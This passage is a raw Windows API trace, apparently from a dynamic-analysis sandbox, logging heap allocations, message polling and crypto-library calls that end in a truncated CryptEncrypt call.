0x7da2d8 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5068) returned 0x95f0f8 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.870] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.870] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.870] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0035.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.871] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.871] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.872] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.873] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0035.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.874] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.876] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.876] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.876] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.876] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.876] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0035.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.876] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.876] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.877] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.877] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.877] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.877] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.877] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.877] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x5068, dwBufLen=0x0 | out: pbData=0x0*, 